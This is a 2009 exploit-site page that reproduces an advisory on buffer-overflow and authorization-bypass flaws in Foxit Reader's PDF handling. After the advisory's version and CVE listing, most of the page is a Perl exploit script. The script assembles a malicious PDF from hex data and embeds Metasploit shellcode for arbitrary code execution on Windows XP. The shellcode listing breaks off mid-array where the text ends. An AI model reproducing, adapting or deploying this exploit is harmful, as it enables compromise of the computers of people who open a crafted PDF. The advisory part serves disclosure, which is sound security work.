No account yet?
Home » Exploits » Foxit Reader PDF Handling Multiple Remote Vulnerabilities
Foxit Reader PDF Handling Multiple Remote Vulnerabilities E-mail
Feeds - Exploits
Written by Alin Rad Pop and Core Security Technologies   
Thursday, 26 March 2009 22:46
Foxit Reader PDF Handling Multiple Remote Vulnerabilities


-\\Bugtraq ID:
34035

-\\Class:
Boundary Condition Error

-\\CVE:
CVE-2009-0191
CVE-2009-0836
CVE-2009-0837


-\\Remote:
Yes

-\\Local:
No

-\\Published:
Mar 09 2009 12:00AM

-\\Updated:
Mar 26 2009 05:06PM

-\\Credit:
Alin Rad Pop and Core Security Technologies



-\\Vulnerable:
Foxit Foxit Reader 3.0.2009 1301
Foxit Foxit Reader  3.0
Foxit Foxit Reader  2.3



-\\Not Vulnerable:
Foxit Foxit Reader  3.0 Build 1506
Foxit Foxit Reader  2.3 Build 3902



-\\Discussion
Foxit Reader is prone to multiple remote vulnerabilities,

Attackers may leverage these issues to execute arbitrary code in the context of the application.
Successful exploits may compromise the application and the underlying computer. Failed attacks
will cause denial-of-service conditions.

The issues affect Foxit Reader 3.0.2009.1301, 3.0, and 2.3. Other versions may also be affected.



-\\Exploit(s)/PoC(s):
The following exploits are available to members of the Immunity Partners program:

https://www.immunityinc.com/downloads/immpartners/FoxitLaunchit.tar.gz
https://www.immunityinc.com/downloads/immpartners/foxit_Action.tar

Multiple exploit examples are available.

UPDATE (March 26, 2009): The buffer-overflow issue is being exploited in the wild.
Please see the references for more information.
============================
http://www.securityfocus.com/data/vulnerabilities/exploits/core-2009-0218-poc-authorization-bypass.pdf
http://www.securityfocus.com/data/vulnerabilities/exploits/core-2009-0218-poc-bof.pdf
=====================================================
34035.pl
^^^^^^^^^
#!/usr/bin/perl
#
# Foxit Reader 3.0 (<= Build 1301) PDF Buffer Overflow Exploit
# ------------------------------------------------------------
# Exploit by SkD                          ( This e-mail address is being protected from spambots. You need JavaScript enabled to view it )
#
# A SEH overflow occurs in this vulnerability in the popular
# Foxit Reader. The latest build (1506) is not affected but
# previous are. SafeSEH is a bitch in this one, but nothing
# is impossible :).
#
# Exploit written for Windows XP SP3.
#
# Credits to CORE Sec.
#
# Note: Author is not responsible for any damage done with this.

use strict;
use warnings;

my $pdf_data1 = "\x25\x50\x44\x46\x2D\x31\x2E\x34\x0D\x0A\x25\xA1\xB3\xC5\xD7\x0D\x0A\x31\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70".
            "\x65\x2F\x50\x61\x67\x65\x2F\x50\x61\x72\x65\x6E\x74\x20\x34\x20\x30\x20\x52\x20\x2F\x52\x65\x73\x6F\x75\x72\x63\x65\x73\x20\x36".
            "\x20\x30\x20\x52\x20\x2F\x4D\x65\x64\x69\x61\x42\x6F\x78\x5B\x20\x30\x20\x30\x20\x35\x39\x35\x20\x38\x34\x32\x5D\x2F\x47\x72\x6F".
            "\x75\x70\x3C\x3C\x2F\x53\x2F\x54\x72\x61\x6E\x73\x70\x61\x72\x65\x6E\x63\x79\x2F\x43\x53\x2F\x44\x65\x76\x69\x63\x65\x52\x47\x42".
            "\x2F\x49\x20\x74\x72\x75\x65\x3E\x3E\x2F\x43\x6F\x6E\x74\x65\x6E\x74\x73\x20\x32\x20\x30\x20\x52\x20\x2F\x41\x6E\x6E\x6F\x74\x73".
            "\x5B\x20\x39\x20\x30\x20\x52\x20\x20\x32\x34\x20\x30\x20\x52\x20\x20\x32\x35\x20\x30\x20\x52\x20\x5D\x3E\x3E\x0D\x0A\x65\x6E\x64".
            "\x6F\x62\x6A\x0D\x0A\x32\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4C\x65\x6E\x67\x74\x68\x20\x33\x20\x30\x20\x52\x20\x2F\x46".
            "\x69\x6C\x74\x65\x72\x2F\x46\x6C\x61\x74\x65\x44\x65\x63\x6F\x64\x65\x3E\x3E\x73\x74\x72\x65\x61\x6D\x0D\x0A\x78\x9C\x33\xD0\x33".
            "\x54\x28\xE7\x2A\x54\x30\x50\x30\x00\xB2\x4C\x2D\x4D\xF5\x8C\x15\x2C\x4C\x0C\xF5\x2C\x15\x8A\x52\x15\xC2\xB5\x14\xF2\xB8\x02\x15".
            "\x00\x87\xEB\x07\x8A\x0D\x0A\x65\x6E\x64\x73\x74\x72\x65\x61\x6D\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x33\x20\x30\x20\x6F\x62".
            "\x6A\x0D\x0A\x20\x34\x32\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x34\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65".
            "\x2F\x50\x61\x67\x65\x73\x2F\x52\x65\x73\x6F\x75\x72\x63\x65\x73\x20\x36\x20\x30\x20\x52\x20\x2F\x4D\x65\x64\x69\x61\x42\x6F\x78".
            "\x5B\x20\x30\x20\x30\x20\x35\x39\x35\x20\x38\x34\x32\x5D\x2F\x4B\x69\x64\x73\x5B\x20\x31\x20\x30\x20\x52\x20\x5D\x2F\x43\x6F\x75".
            "\x6E\x74\x20\x31\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x35\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x5A\x69\x54\x69".
            "\x20\x31\x38\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x36\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F".
            "\x46\x6F\x6E\x74\x20\x35\x20\x30\x20\x52\x20\x2F\x50\x72\x6F\x63\x53\x65\x74\x5B\x2F\x50\x44\x46\x2F\x54\x65\x78\x74\x5D\x3E\x3E".
            "\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x37\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x43\x61\x74\x61\x6C".
            "\x6F\x67\x2F\x50\x61\x67\x65\x73\x20\x34\x20\x30\x20\x52\x20\x2F\x4F\x70\x65\x6E\x41\x63\x74\x69\x6F\x6E\x5B\x20\x31\x20\x30\x20".
            "\x52\x20\x2F\x58\x59\x5A\x20\x6E\x75\x6C\x6C\x20\x6E\x75\x6C\x6C\x20\x30\x5D\x2F\x4C\x61\x6E\x67\x28\x65\x6E\x2D\x55\x53\x29\x3E".
            "\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x38\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x41\x75\x74\x68\x6F\x72\x28\xFE\xFF".
            "\x00\x6D\x00\x61\x00\x72\x00\x63\x00\x69\x00\x61\x00\x6E\x00\x6F\x29\x2F\x43\x72\x65\x61\x74\x6F\x72\x28\xFE\xFF\x00\x57\x00\x72".
            "\x00\x69\x00\x74\x00\x65\x00\x72\x29\x2F\x50\x72\x6F\x64\x75\x63\x65\x72\x28\xFE\xFF\x00\x4F\x00\x70\x00\x65\x00\x6E\x00\x4F\x00".
            "\x66\x00\x66\x00\x69\x00\x63\x00\x65\x00\x2E\x00\x6F\x00\x72\x00\x67\x00\x20\x00\x33\x00\x2E\x00\x30\x29\x2F\x43\x72\x65\x61\x74".
            "\x69\x6F\x6E\x44\x61\x74\x65\x28\x44\x3A\x32\x30\x30\x39\x30\x32\x31\x39\x31\x34\x34\x35\x34\x39\x2D\x30\x32\x27\x30\x30\x27\x29".
            "\x2F\x4D\x6F\x64\x44\x61\x74\x65\x28\x44\x3A\x32\x30\x30\x39\x30\x32\x31\x39\x31\x34\x34\x38\x31\x35\x2D\x30\x32\x27\x30\x30\x27".
            "\x29\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x35\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x46".
            "\x69\x6C\x65\x73\x70\x65\x63\x2F\x46\x28\x63\x75\x61\x6C\x71\x75\x69\x65\x72\x61\x29\x2F\x46\x53\x2F\x55\x52\x4C\x3E\x3E\x0D\x0A".
            "\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x34\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x53\x2F\x4D\x43\x44\x2F\x43\x54\x28\x61\x70".
            "\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x66\x75\x74\x75\x72\x65\x73\x70\x6C\x61\x73\x68\x29\x2F\x50\x3C\x3C\x2F\x54\x46\x28\x54".
            "\x45\x4D\x50\x41\x43\x43\x45\x53\x53\x29\x3E\x3E\x2F\x44\x20\x31\x35\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A".
            "\x0D\x0A\x31\x33\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x53\x2F\x4D\x52\x2F\x43\x20\x31\x34\x20\x30\x20\x52\x20\x2F\x4E\x28".
            "\x63\x75\x61\x6C\x71\x75\x69\x65\x72\x61\x29\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x32\x20\x30\x20\x6F\x62\x6A\x0D".
            "\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x41\x63\x74\x69\x6F\x6E\x2F\x53\x2F\x52\x65\x6E\x64\x69\x74\x69\x6F\x6E\x2F\x4F\x50\x20\x34".
            "\x2F\x41\x4E\x20\x39\x20\x30\x20\x52\x20\x2F\x52\x20\x31\x33\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A".
            "\x31\x31\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x45\x78\x74\x47\x53\x74\x61\x74\x65\x2F\x43\x41\x20\x31".
            "\x2F\x63\x61\x20\x31\x2F\x41\x49\x53\x20\x66\x61\x6C\x73\x65\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x30\x20\x30\x20".
            "\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4D\x61\x74\x72\x69\x78\x5B\x20\x31\x20\x30\x20\x30\x20\x31\x20\x30\x20\x30\x5D\x2F\x42\x42\x6F".
            "\x78\x5B\x20\x30\x20\x30\x20\x31\x33\x30\x2E\x31\x33\x39\x20\x32\x37\x2E\x32\x38\x39\x37\x5D\x2F\x52\x65\x73\x6F\x75\x72\x63\x65".
            "\x73\x3C\x3C\x2F\x45\x78\x74\x47\x53\x74\x61\x74\x65\x3C\x3C\x2F\x49\x6D\x61\x67\x65\x4F\x70\x61\x63\x69\x74\x79\x20\x31\x31\x20".
            "\x30\x20\x52\x20\x3E\x3E\x3E\x3E\x2F\x4C\x65\x6E\x67\x74\x68\x20\x35\x34\x2F\x46\x69\x6C\x74\x65\x72\x2F\x46\x6C\x61\x74\x65\x44".
            "\x65\x63\x6F\x64\x65\x3E\x3E\x73\x74\x72\x65\x61\x6D\x0D\x0A\x78\x9C\x2B\xE4\x2A\xE4\x32\x50\x00\xC1\xA2\x74\x30\xC3\xD0\xD8\x40".
            "\xCF\xD0\xD8\x52\xC1\xC8\x5C\xCF\xC8\xC2\xD2\x5C\xA1\x28\x95\xCB\x50\x01\x08\x8D\x2C\x20\xC2\xA6\x70\xE1\x34\x2D\xAE\x40\x20\x04".
            "\x00\xBD\x52\x0D\x43\x0D\x0A\x65\x6E\x64\x73\x74\x72\x65\x61\x6D\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x39\x20\x30\x20\x6F\x62".
            "\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x41\x6E\x6E\x6F\x74\x2F\x53\x75\x62\x74\x79\x70\x65\x2F\x53\x63\x72\x65\x65\x6E\x2F".
            "\x50\x20\x31\x20\x30\x20\x52\x20\x2F\x4D\x28\x44\x3A\x32\x30\x30\x39\x30\x32\x31\x39\x31\x34\x34\x37\x35\x36\x2D\x30\x32\x27\x30".
            "\x30\x27\x29\x2F\x46\x20\x34\x2F\x52\x65\x63\x74\x5B\x20\x32\x30\x35\x2E\x31\x35\x33\x20\x38\x30\x36\x2E\x31\x38\x32\x20\x33\x33".
            "\x35\x2E\x32\x39\x31\x20\x38\x33\x33\x2E\x34\x37\x32\x5D\x2F\x42\x53\x3C\x3C\x2F\x53\x2F\x53\x2F\x57\x20\x31\x3E\x3E\x2F\x42\x45".
            "\x3C\x3C\x2F\x53\x2F\x53\x3E\x3E\x2F\x4D\x4B\x3C\x3C\x2F\x42\x43\x5B\x20\x30\x20\x30\x20\x31\x5D\x2F\x52\x20\x30\x2F\x49\x46\x3C".
            "\x3C\x2F\x53\x57\x2F\x41\x2F\x53\x2F\x41\x2F\x46\x42\x20\x66\x61\x6C\x73\x65\x2F\x41\x5B\x20\x30\x2E\x35\x20\x30\x2E\x35\x5D\x3E".
            "\x3E\x3E\x3E\x2F\x41\x50\x3C\x3C\x2F\x4E\x20\x31\x30\x20\x30\x20\x52\x20\x3E\x3E\x2F\x54\x28\x63\x75\x61\x6C\x71\x75\x69\x65\x72".
            "\x61\x29\x2F\x41\x20\x31\x32\x20\x30\x20\x52\x20\x2F\x41\x41\x20\x31\x37\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62".
            "\x6A\x0D\x0A\x32\x35\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x41\x6E\x6E\x6F\x74\x2F\x53\x75\x62\x74\x79".
            "\x70\x65\x2F\x50\x6F\x70\x75\x70\x2F\x50\x20\x31\x20\x30\x20\x52\x20\x2F\x4D\x28\x44\x3A\x32\x30\x30\x39\x30\x32\x31\x39\x31\x34".
            "\x34\x38\x31\x35\x2D\x30\x32\x27\x30\x30\x27\x29\x2F\x46\x20\x32\x38\x2F\x52\x65\x63\x74\x5B\x20\x30\x20\x30\x20\x30\x20\x30\x5D".
            "\x2F\x4F\x70\x65\x6E\x20\x66\x61\x6C\x73\x65\x2F\x50\x61\x72\x65\x6E\x74\x20\x32\x34\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E".
            "\x64\x6F\x62\x6A\x0D\x0A\x32\x34\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x53\x75\x62\x74\x79\x70\x65\x2F\x46\x72\x65\x65\x54".
            "\x65\x78\x74\x2F\x52\x65\x63\x74\x5B\x20\x32\x38\x35\x20\x37\x39\x34\x20\x35\x34\x31\x20\x38\x32\x37\x5D\x2F\x46\x20\x34\x2F\x41".
            "\x50\x20\x31\x39\x20\x30\x20\x52\x20\x2F\x46\x6F\x78\x69\x74\x54\x61\x67\x20\x32\x33\x20\x30\x20\x52\x20\x2F\x50\x20\x31\x20\x30".
            "\x20\x52\x20\x2F\x50\x6F\x70\x75\x70\x20\x32\x35\x20\x30\x20\x52\x20\x2F\x46\x4E\x28\x48\x65\x6C\x76\x65\x74\x69\x63\x61\x29\x2F".
            "\x43\x6F\x6E\x74\x65\x6E\x74\x73\x28\x45\x64\x69\x74\x65\x64\x20\x62\x79\x20\x46\x6F\x78\x69\x74\x20\x52\x65\x61\x64\x65\x72\x5C".
            "\x72\x43\x6F\x70\x79\x72\x69\x67\x68\x74\x5C\x28\x43\x5C\x29\x20\x62\x79\x20\x46\x6F\x78\x69\x74\x20\x53\x6F\x66\x74\x77\x61\x72".
            "\x65\x20\x43\x6F\x6D\x70\x61\x6E\x79\x2C\x32\x30\x30\x35\x2D\x32\x30\x30\x38\x5C\x72\x46\x6F\x72\x20\x45\x76\x61\x6C\x75\x61\x74".
            "\x69\x6F\x6E\x20\x4F\x6E\x6C\x79\x2E\x5C\x72\x29\x2F\x42\x4B\x43\x20\x36\x35\x35\x33\x35\x2F\x51\x20\x30\x2F\x44\x41\x28\x2F\x5A".
            "\x69\x54\x69\x20\x31\x31\x20\x54\x66\x20\x31\x20\x30\x20\x30\x20\x72\x67\x20\x31\x20\x30\x20\x30\x20\x31\x20\x32\x38\x35\x20\x38".
            "\x31\x30\x2E\x35\x20\x54\x6D\x20\x30\x20\x54\x63\x20\x31\x30\x30\x20\x54\x7A\x29\x2F\x49\x54\x2F\x46\x72\x65\x65\x54\x65\x78\x74".
            "\x54\x79\x70\x65\x77\x72\x69\x74\x65\x72\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x33\x20\x30\x20\x6F\x62\x6A\x0D\x0A".
            "\x3C\x3C\x2F\x54\x65\x78\x74\x4D\x61\x74\x72\x69\x78\x5B\x20\x31\x20\x30\x20\x30\x20\x31\x20\x32\x38\x35\x20\x38\x31\x30\x2E\x35".
            "\x5D\x2F\x4C\x69\x63\x65\x6E\x73\x65\x28\x45\x76\x61\x6C\x75\x61\x74\x69\x6F\x6E\x29\x2F\x4D\x65\x6E\x64\x65\x72\x46\x6C\x61\x67".
            "\x28\x45\x76\x61\x6C\x75\x61\x74\x69\x6F\x6E\x2C\x41\x4E\x4E\x4F\x54\x29\x2F\x46\x6F\x6E\x74\x4E\x61\x6D\x65\x28\x48\x65\x6C\x76".
            "\x65\x74\x69\x63\x61\x29\x2F\x46\x6F\x6E\x74\x53\x69\x7A\x65\x20\x31\x31\x2F\x54\x65\x78\x74\x28\x45\x64\x69\x74\x65\x64\x20\x62".
            "\x79\x20\x46\x6F\x78\x69\x74\x20\x52\x65\x61\x64\x65\x72\x5C\x72\x43\x6F\x70\x79\x72\x69\x67\x68\x74\x5C\x28\x43\x5C\x29\x20\x62".
            "\x79\x20\x46\x6F\x78\x69\x74\x20\x53\x6F\x66\x74\x77\x61\x72\x65\x20\x43\x6F\x6D\x70\x61\x6E\x79\x2C\x32\x30\x30\x35\x2D\x32\x30".
            "\x30\x38\x5C\x72\x46\x6F\x72\x20\x45\x76\x61\x6C\x75\x61\x74\x69\x6F\x6E\x20\x4F\x6E\x6C\x79\x2E\x5C\x72\x29\x2F\x43\x68\x61\x72".
            "\x43\x6F\x6C\x6F\x72\x20\x32\x35\x35\x2F\x43\x68\x61\x72\x53\x70\x61\x63\x65\x20\x30\x2F\x4C\x69\x6E\x65\x46\x65\x65\x64\x20\x30".
            "\x2F\x48\x6F\x72\x7A\x53\x63\x61\x6C\x65\x20\x31\x30\x30\x2F\x4F\x72\x69\x67\x69\x6E\x58\x20\x32\x38\x35\x2F\x4F\x72\x69\x67\x69".
            "\x6E\x59\x20\x38\x31\x36\x2F\x62\x43\x68\x61\x6E\x67\x65\x42\x6F\x78\x20\x30\x2F\x42\x6F\x78\x57\x69\x64\x74\x68\x20\x32\x35\x36".
            "\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x32\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4D\x79\x46\x6F\x6E\x74\x20".
            "\x31\x38\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x31\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F".
            "\x46\x6F\x6E\x74\x20\x32\x32\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x30\x20\x30\x20\x6F\x62\x6A".
            "\x0D\x0A\x3C\x3C\x2F\x4C\x65\x6E\x67\x74\x68\x20\x31\x36\x38\x2F\x53\x75\x62\x74\x79\x70\x65\x2F\x46\x6F\x72\x6D\x2F\x42\x42\x6F".
            "\x78\x5B\x20\x32\x38\x35\x20\x37\x39\x34\x20\x35\x34\x31\x20\x38\x32\x37\x5D\x2F\x52\x65\x73\x6F\x75\x72\x63\x65\x73\x20\x32\x31".
            "\x20\x30\x20\x52\x20\x2F\x46\x69\x6C\x74\x65\x72\x2F\x46\x6C\x61\x74\x65\x44\x65\x63\x6F\x64\x65\x3E\x3E\x73\x74\x72\x65\x61\x6D".
            "\x0D\x0A\x78\x9C\x95\x8D\xCD\x0E\x82\x30\x10\x84\xEF\x7D\x8A\x3D\x42\xA2\xD8\x16\x88\x78\x15\xE1\x66\x4C\xB4\x2F\x50\x43\xC1\x1A".
            "\xE8\x92\xA6\xFE\xF4\xED\x25\x24\x28\x89\x27\xF6\x30\x99\x99\x6C\xBE\xD9\x0B\xB2\x39\xFA\x12\x8D\x03\xC6\x40\xD4\x84\x45\x74\x3C".
            "\xA0\x7F\xC6\x36\x84\xC1\x90\x81\x01\xCF\xD2\xA9\xDD\xEE\x92\xC9\x8A\x8E\x7C\x9F\x79\x12\xC5\x9C\x51\x3A\x40\x0F\x24\x28\x2A\xED".
            "\x54\x05\x57\x0F\x25\xBE\xB5\x83\xB3\x92\x95\xB2\x21\x88\xFB\x02\x24\x8B\xE7\xC8\x1C\x7B\x6F\x75\x73\x73\x41\x1E\xFE\xC0\x17\xAC".
            "\xDD\x4B\x5A\x05\x39\x76\xBD\x34\x7E\xC5\x29\x4D\xD7\x83\x64\x0B\xC7\xF8\x7C\xAB\x44\x0B\xC5\x53\xB6\x0F\xE9\x34\x1A\x38\x99\xD6".
            "\x47\x23\xAF\x10\xE4\x03\x4A\x14\x4C\x32\x0D\x0A\x65\x6E\x64\x73\x74\x72\x65\x61\x6D\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31".
            "\x39\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4E\x20\x32\x30\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D".
            "\x0A\x31\x38\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x46\x6F\x6E\x74\x2F\x53\x75\x62\x74\x79\x70\x65\x2F".
            "\x54\x79\x70\x65\x31\x2F\x42\x61\x73\x65\x46\x6F\x6E\x74\x2F\x48\x65\x6C\x76\x65\x74\x69\x63\x61\x2F\x45\x6E\x63\x6F\x64\x69\x6E".
            "\x67\x2F\x57\x69\x6E\x41\x6E\x73\x69\x45\x6E\x63\x6F\x64\x69\x6E\x67\x2F\x46\x78\x54\x61\x67\x20\x31\x3E\x3E\x0D\x0A\x65\x6E\x64".
            "\x6F\x62\x6A\x0D\x0A\x31\x37\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x50\x56\x20\x31\x36\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A".
            "\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x36\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x41\x63\x74\x69\x6F\x6E".
            "\x2F\x53\x2F\x4C\x61\x75\x6E\x63\x68\x2F\x46\x3C\x3C\x2F\x46\x28\x2F\x43\x2F";
my $pdf_data2 = "\x29\x3E\x3E\x2F\x4E\x65\x77\x57\x69\x6E\x64\x6F\x77\x20\x74\x72\x75\x65\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x78\x72".
            "\x65\x66\x0D\x0A\x30\x20\x32\x36\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x36\x35\x35\x33\x36\x20\x66\x0D\x0A\x30\x30".
            "\x30\x30\x30\x30\x30\x30\x31\x37\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x31\x39\x37\x20\x30\x30\x30".
            "\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x33\x31\x34\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30".
            "\x30\x33\x33\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x34\x33\x32\x20\x30\x30\x30\x30\x30\x20\x6E".
            "\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x34\x36\x38\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x35\x32\x32".
            "\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x36\x31\x39\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30".
            "\x30\x30\x30\x30\x31\x33\x37\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x31\x31\x34\x37\x20\x30\x30\x30".
            "\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x31\x30\x38\x38\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30".
            "\x31\x30\x31\x35\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x39\x36\x32\x20\x30\x30\x30\x30\x30\x20\x6E".
            "\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x38\x37\x32\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x38\x31\x33".
            "\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x32\x39\x38\x34\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30".
            "\x30\x30\x30\x30\x32\x39\x34\x39\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x32\x38\x34\x39\x20\x30\x30\x30".
            "\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x32\x38\x31\x35\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30".
            "\x32\x35\x32\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x32\x34\x38\x33\x20\x30\x30\x30\x30\x30\x20\x6E".
            "\x0D\x0A\x30\x30\x30\x30\x30\x30\x32\x34\x34\x34\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x32\x31\x30\x32".
            "\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x31\x37\x36\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30".
            "\x30\x30\x30\x30\x31\x36\x33\x35\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x74\x72\x61\x69\x6C\x65\x72\x0D\x0A\x3C\x3C\x2F\x52\x6F".
            "\x6F\x74\x20\x37\x20\x30\x20\x52\x20\x2F\x49\x6E\x66\x6F\x20\x38\x20\x30\x20\x52\x20\x2F\x49\x44\x5B\x28\xDF\xB0\x2B\xEC\xF3\x6B".
            "\xFA\x01\x9C\xBC\x4B\x06\x11\x7C\x78\x79\x29\x28\xDF\xB0\x2B\xEC\xF3\x6B\xFA\x01\x9C\xBC\x4B\x06\x11\x7C\x78\x79\x29\x5D\x2F\x44".
            "\x6F\x63\x43\x68\x65\x63\x6B\x73\x75\x6D\x2F\x37\x36\x33\x36\x30\x32\x39\x46\x42\x32\x42\x32\x46\x44\x32\x39\x42\x43\x33\x34\x41".
            "\x42\x43\x33\x32\x43\x46\x34\x35\x42\x38\x46\x2F\x53\x69\x7A\x65\x20\x32\x36\x3E\x3E\x0D\x0A\x73\x74\x61\x72\x74\x78\x72\x65\x66".
            "\x0D\x0A\x38\x30\x35\x37\x0D\x0A\x25\x25\x45\x4F\x46\x0D\x0A";

# win32_exec -  EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x30\x42\x50\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x37".
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x58".
"\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x38\x46\x53\x4b\x58".
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x37\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54".
"\x4b\x48\x4f\x55\x4e\x41\x41\x50\x4b\x4e\x4b\x48\x4e\x31\x4b\x38".
"\x41\x30\x4b\x4e\x49\x58\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
"\x42\x4c\x46\x46\x4b\x58\x42\x44\x42\x33\x45\x38\x42\x4c\x4a\x47".
"\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x48\x42\x37\x4e\x51\x4d\x4a".
